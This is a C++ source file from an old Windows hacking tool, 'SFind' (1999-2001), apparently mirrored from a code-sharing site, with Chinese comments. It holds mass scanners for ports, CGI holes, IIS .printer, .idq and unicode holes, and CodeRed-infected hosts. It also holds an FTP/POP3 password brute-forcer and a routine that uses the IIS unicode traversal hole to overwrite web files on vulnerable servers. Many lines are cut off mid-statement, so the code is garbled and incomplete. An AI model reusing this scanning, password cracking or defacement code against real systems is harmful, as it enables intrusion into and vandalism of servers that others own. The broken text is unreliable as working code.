SunwFind.zip UNICODE.CPP

www.pudn.com > SunwFind.zip > UNICODE.CPP
/* 
=========SFind command line super tools version 1.9==========  
========By Sunw 1999-2001. http://sw_sun.myetang.com========= 
*/ 
#include "afxext.h" 
#include "winsock.h" 
#include "iostream.h" 
#include "fstream.h" 
#include "unicode.h" 
#include "windows.h" 
//函数声明 
void plango();//进度显示 
bool ResetCursor(int y, int x);//设置光标坐标 
UINT cracker(LPVOID pass);//ftp、pop3穷举 
void checkiisholetype();//检查扫描iis的漏洞类型 
void TestThread(int thread=50);//测试当前线程是否以满 
void WaitThreadEnd();//等带线程结束 
void usage(char* prog);//帮助信息 
int passdigit(int type=0);//字典位数，参数0默认表示a-z,1表示0-9,2表示综合 
int uhack(char *ip);//修改unicode漏洞主机的web文件 
void ver();//版本信息 
UINT ftpanonymous(LPVOID ip);//扫描ftp匿名登陆 
UINT cgiscan(LPVOID cgistr);//扫描CGI漏洞 
UINT iisscan(LPVOID ip);//扫描iis漏洞 
UINT pscan(LPVOID port);//端口扫描 
//变量定义 
HANDLE hstdout=NULL; 
WSADATA wsadata; 
ofstream myf("sfind.txt",ios::ate); 
HANDLE HMUTEX; 
int maxthread=0,ok=0,nub=0,portip,ipstart,ipstop,hoststart,hoststop,plan=0,line=5,searchnumber,searchend=0,digit=1; 
short portx; 
char strch[14]; 
char * type,* message,* uhackip,*webpath="c:\\inetpub\\wwwroot",sendbuf[100],checkhole[100],iisholemessage[100],*ftpuser; 
bool ptop=false,porttype=false,ftpopt=false,connecterror=false,endx=false; 
CWinThread* pthread; 
int main(int argc,char *argv[]) 
{ 
if (argc<2){usage(argv[0]);return -1;} 
type=argv[1]; 
if (WSAStartup(MAKEWORD(1,1),&wsadata)!=0){cout<<"wsatartup error"<7) 
		{  ver(); 
		   if (htonl(inet_addr(argv[4]))%256==0||htonl(inet_addr(argv[4]))%256==255) 
		   {cout<<"invalidation address."<7)||((argc==4)&&strlen(argv[2])>7&&strlen(argv[3])>7)) 
		{  ver(); 
		   porttype=true; 
		   if (argc==3) argv[3]=argv[2];                        
		   ipstart=inet_addr(argv[2]); 
	       ipstop=inet_addr(argv[3]); 
           hoststart=ntohl(ipstart); 
		   hoststop=ntohl(ipstop); 
		   searchnumber=hoststop-hoststart; 
		} 
		 
		//自定义端口扫描参数5定义3389 127.0.0.1 127.0.0.255 
	    if (((argc==5)&&(strlen(argv[2])<7)&&(strlen(argv[3]))>7&&(strlen(argv[4])>7))||((argc==4)&&(strlen(argv[2])<7)&&(strlen(argv[3])>7))) 
		{  ver(); 
		   porttype=true; 
		   if (argc==4) argv[4]=argv[3]; 
		   ipstart=inet_addr(argv[3]); 
	       ipstop=inet_addr(argv[4]); 
           hoststart=ntohl(ipstart); 
		   hoststop=ntohl(ipstop); 
		   searchnumber=hoststop-hoststart; 
		} 
        for (portip=hoststart;hoststart<=hoststop;hoststart++,portip++,nub++,maxthread++,searchend++,plan++) 
		{ 
            if ((portip%256)==0)   {searchnumber--;nub--; maxthread--;continue;} //略过localhost地址 
            if ((portip%256)==255) {searchnumber--;nub--;maxthread--;continue;}  //略过广播地址 
            //自定义端口扫描3389 127.0.0.1 127.0.0.255 
            if (((argc==5)&&(strlen(argv[2])<7)&&(strlen(argv[3]))>7&&(strlen(argv[4])>7))||((argc==4)&&(strlen(argv[2])<7)&&(strlen(argv[3])>7))) 
			{ 
			    TestThread(); 
		        CWinThread* pthread=AfxBeginThread(pscan,LPVOID(argv[2])); 
				Sleep(10);//延时读取ip地址 
			} 
            //标准端口扫描-p 127.0.0.1 127.0.0.255 
           if ((argc==3)&&(strlen(argv[2])>7)||((argc==4)&&strlen(argv[2])>7&&strlen(argv[3])>7)) 
		   { 
               for (portx=0;portx<10;portx++,maxthread++) 
			   { 
				   TestThread(); 
	               CWinThread* pthread=AfxBeginThread(pscan,LPVOID(ports[portx])); 
	               Sleep(10); //延时读取ip地址      
			   } 
		    	maxthread--; 
		   } 
		} 
		if(porttype==false) {usage(argv[0]);return -1;} 
		WaitThreadEnd(); 
	  cout<5) {usage(argv[0]);return -1;} 
		  if (argc==5)        {webpath=argv[3];message=argv[4];} 
		  if (argc==4)        message=argv[3]; 
		  ver(); 
		  uhack(argv[2]); 
		  break; 
	 } 
	//iis漏洞扫描 
	 if (stricmp(type,"-idq")==0||stricmp(type,"-pri")==0||stricmp(type,"-uni")==0||stricmp(type,"-codered")==0) 
	 { 
	    checkiisholetype(); 
		if (argc==3)  argv[3]=argv[2]; 
		ver(); 
	    ipstart=inet_addr(argv[2]); 
	    ipstop=inet_addr(argv[3]); 
        hoststart=ntohl(ipstart); 
        hoststop=ntohl(ipstop); 
		searchnumber=hoststop-hoststart; 
        for (portip=hoststart;portip<=hoststop;portip++,nub++,maxthread++,plan++,searchend++) 
		{   if (plan>=3) {plan=-1;} 
            if ((portip%256)==0)   {searchnumber--;maxthread--;nub--;continue;} //略过localhost地址 
            if ((portip%256)==255) {searchnumber--;maxthread--;nub--;continue;} //略过广播地址 
            TestThread(); 
	        CWinThread* pthread=AfxBeginThread(iisscan,LPVOID(portip)); 
		} 
	    WaitThreadEnd(); 
	    cout<"<<" "<: "<     Scan port"<                   Scan cgi hole"<             Scan .printer hole"<             Scan unicode hole"<             Scan .idq hole"<             Scan codered virus host"<  [-admin]   Ftp default and admin accounts check"< [Web path]  Modify web files"<+>"); 
	               strcat(mymessage,webpath); 
				   strcat(mymessage,modify[i]); 
                   s=socket(AF_INET,SOCK_STREAM,0); 
                   if (connect(s,(struct sockaddr *)&server,sizeof(server))==SOCKET_ERROR) 
				   {cout<<"connect error"<thread) 
		{//cout<<"thread"<=3) {plan=-1;} 
	return; 
} 
//测试密码位数 
int passdigit(int type) 
{  //字符进位 
	if (type==0) 
	{ 
	if (digit==1&&strch[0]=='z') digit++;  
	if (digit==2&&strch[0]=='z'&&strch[1]=='z') digit++; 
	if (digit==3&&strch[0]=='z'&&strch[1]=='z'&&strch[2]=='z') digit++; 
	if (digit==4&&strch[0]=='z'&&strch[1]=='z'&&strch[2]=='z'&&strch[3]=='z') digit++; 
	if (digit==5&&strch[0]=='z'&&strch[1]=='z'&&strch[2]=='z'&&strch[3]=='z'&&strch[4]=='z') digit++; 
	if (digit==6&&strch[0]=='z'&&strch[1]=='z'&&strch[2]=='z'&&strch[3]=='z'&&strch[4]=='z'&&strch[5]=='z') digit++; 
	if (digit==7&&strch[0]=='z'&&strch[1]=='z'&&strch[2]=='z'&&strch[3]=='z'&&strch[4]=='z'&&strch[5]=='z'&&strch[6]=='z') digit++; 
	if (digit==8&&strch[0]=='z'&&strch[1]=='z'&&strch[2]=='z'&&strch[3]=='z'&&strch[4]=='z'&&strch[5]=='z'&&strch[6]=='z'&&strch[7]=='z') digit++; 
	if (digit==9&&strch[0]=='z'&&strch[1]=='z'&&strch[2]=='z'&&strch[3]=='z'&&strch[4]=='z'&&strch[5]=='z'&&strch[6]=='z'&&strch[7]=='z'&&strch[8]=='z') digit++; 
	if (digit==10&&strch[0]=='z'&&strch[1]=='z'&&strch[2]=='z'&&strch[3]=='z'&&strch[4]=='z'&&strch[5]=='z'&&strch[6]=='z'&&strch[7]=='z'&&strch[8]=='z'&&strch[9]=='z') digit++; 
	if (digit==11&&strch[0]=='z'&&strch[1]=='z'&&strch[2]=='z'&&strch[3]=='z'&&strch[4]=='z'&&strch[5]=='z'&&strch[6]=='z'&&strch[7]=='z'&&strch[8]=='z'&&strch[9]=='z'&&strch[10]=='z') digit++; 
	if (digit==12&&strch[0]=='z'&&strch[1]=='z'&&strch[2]=='z'&&strch[3]=='z'&&strch[4]=='z'&&strch[5]=='z'&&strch[6]=='z'&&strch[7]=='z'&&strch[8]=='z'&&strch[9]=='z'&&strch[10]=='z'&&strch[11]=='z') digit++; 
	if (digit==13&&strch[0]=='z'&&strch[1]=='z'&&strch[2]=='z'&&strch[3]=='z'&&strch[4]=='z'&&strch[5]=='z'&&strch[6]=='z'&&strch[7]=='z'&&strch[8]=='z'&&strch[9]=='z'&&strch[10]=='z'&&strch[11]=='z'&&strch[12]=='z') digit++; 
	} 
	//数字进位 
	if (type==1) 
	{ 
	if (digit==1&&strch[0]=='9') digit++;  
	if (digit==2&&strch[0]=='9'&&strch[1]=='9') digit++; 
	if (digit==3&&strch[0]=='9'&&strch[1]=='9'&&strch[2]=='9') digit++; 
	if (digit==4&&strch[0]=='9'&&strch[1]=='9'&&strch[2]=='9'&&strch[3]=='9') digit++; 
	if (digit==5&&strch[0]=='9'&&strch[1]=='9'&&strch[2]=='9'&&strch[3]=='9'&&strch[4]=='9') digit++; 
	if (digit==6&&strch[0]=='9'&&strch[1]=='9'&&strch[2]=='9'&&strch[3]=='9'&&strch[4]=='9'&&strch[5]=='9') digit++; 
	if (digit==7&&strch[0]=='9'&&strch[1]=='9'&&strch[2]=='9'&&strch[3]=='9'&&strch[4]=='9'&&strch[5]=='9'&&strch[6]=='9') digit++; 
	if (digit==8&&strch[0]=='9'&&strch[1]=='9'&&strch[2]=='9'&&strch[3]=='9'&&strch[4]=='9'&&strch[5]=='9'&&strch[6]=='9'&&strch[7]=='9') digit++; 
	if (digit==9&&strch[0]=='9'&&strch[1]=='9'&&strch[2]=='9'&&strch[3]=='9'&&strch[4]=='9'&&strch[5]=='9'&&strch[6]=='9'&&strch[7]=='9'&&strch[8]=='9') digit++; 
	if (digit==10&&strch[0]=='9'&&strch[1]=='9'&&strch[2]=='9'&&strch[3]=='9'&&strch[4]=='9'&&strch[5]=='9'&&strch[6]=='9'&&strch[7]=='9'&&strch[8]=='9'&&strch[9]=='9') digit++; 
	if (digit==11&&strch[0]=='9'&&strch[1]=='9'&&strch[2]=='9'&&strch[3]=='9'&&strch[4]=='9'&&strch[5]=='9'&&strch[6]=='9'&&strch[7]=='9'&&strch[8]=='9'&&strch[9]=='9'&&strch[10]=='9') digit++; 
	if (digit==12&&strch[0]=='9'&&strch[1]=='9'&&strch[2]=='9'&&strch[3]=='9'&&strch[4]=='9'&&strch[5]=='9'&&strch[6]=='9'&&strch[7]=='9'&&strch[8]=='9'&&strch[9]=='9'&&strch[10]=='9'&&strch[11]=='9') digit++; 
	if (digit==13&&strch[0]=='9'&&strch[1]=='9'&&strch[2]=='9'&&strch[3]=='9'&&strch[4]=='9'&&strch[5]=='9'&&strch[6]=='9'&&strch[7]=='9'&&strch[8]=='9'&&strch[9]=='9'&&strch[10]=='9'&&strch[11]=='9'&&strch[12]=='9') digit++; 
	} 
	return 0; 
} 
//穷举函数 
UINT cracker(LPVOID pass) 
{  
	char static *ftppassword=(char*)pass,checkhole1[5],checkhole2[5],checkhole3[5]; 
	char recvbuf[500],ftpsendpass[100],ftpsenduser[100],recvbufpop[500]; 
    SOCKET s; 
	sockaddr_in server; 
	server.sin_family=AF_INET; 
    server.sin_addr.s_addr=inet_addr(uhackip); 
	if (ftpopt==true) 
    server.sin_port=htons(21); 
	else server.sin_port=htons(110); 
	//显示进度 
	cout<<"Test: "<<(char *)pass<<"\r"; 
    //设置套接字为非阻塞模式 
    struct fd_set mask; 
    struct timeval timeout; 
	strcpy(ftpsenduser,"user "); 
	strcat(ftpsenduser,ftpuser); 
	strcat(ftpsenduser,"\r\n"); 
    strcpy(ftpsendpass,"pass "); 
    strcat(ftpsendpass,ftppassword); 
    strcat(ftpsendpass,"\r\n"); 
	s=socket(AF_INET,SOCK_STREAM,0); 
	if (ftpopt==true) 
	{ 
		strcpy(checkhole1,"220"); 
	    strcpy(checkhole2,"331"); 
	    strcpy(checkhole3,"230"); 
	} 
	else 
	{ 
		strcpy(checkhole1,"+OK "); 
	    strcpy(checkhole2,"+OK "); 
		strcpy(checkhole3,"+OK "); 
	} 
    if (s==INVALID_SOCKET) {cout<<"Socket() Error"<